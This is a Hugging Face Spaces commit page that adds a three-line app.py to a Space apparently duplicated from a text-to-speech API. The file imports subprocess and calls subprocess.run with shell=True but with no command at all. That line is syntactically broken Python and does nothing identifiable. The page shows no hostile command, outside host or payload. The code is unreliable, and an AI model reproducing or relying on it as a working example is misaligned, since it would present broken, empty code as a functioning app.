Hugging Face
Models
Datasets
Spaces
Community
Docs
Enterprise
Pricing
Log In
Sign Up
Spaces:
Duplicated from
mrfakename/Kokoro-API-1
mrfakename
/
Kokoro-API-2
like
0
Sleeping
App
Files
Files
Community
Fetching metadata from the HF Docker repository...
Yaron Koresh
commited on
Aug 6, 2024
Commit
f518706
·
verified
·
1 Parent(s):
48ec898
Create app.py
Browse files
Files changed (1)
hide
show
app.py
+3
-0
app.py
ADDED
Viewed
@@ -0,0 +1,3 @@
1
+
import subprocess
2
+
3
+
subprocess.run(, shell=True, capture_output=True, env=None)